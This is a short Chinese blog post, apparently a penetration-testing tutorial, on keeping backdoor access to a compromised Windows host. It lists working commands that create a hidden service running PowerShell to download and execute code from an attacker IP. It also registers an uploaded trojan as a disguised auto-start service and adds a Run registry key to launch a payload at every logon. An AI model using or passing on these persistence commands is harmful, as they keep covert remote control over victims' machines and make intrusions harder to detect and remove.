权限维持:简单来说就是让我们可以更久的控制一台电脑
生成监听后门:提权之后我们要创建一个监听后门
shell sc create "ALGS" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.17.142:80/a'))\"
#生成一个ALGS服务
shell SC config "ALGS" start= auto #设置name服务为自动
shell SC description "ALGS" "description" #设置服务描述
shell net start "ALGS" #启动服务
shell SC delete "ALGS" #删除服务
设置完后门服务后,目标主机重启后不断向攻击服务器发送数据
通过可执行文件留下维持权限的后门:首先要在目标主机上传木马,并记住路径
生成win service exe payload
sc create ALGS binpath= "C:\Users\Administrator\Contacts\payload.exe" start= auto displayname= "Application Layer Gateway Se"
sc start ALGS
sc delete ALGS
sc stop ALGC //ALGS是服务名,displayname是服务描述
通过注册表留后门
shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Windows\system32\a.exe" /f
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix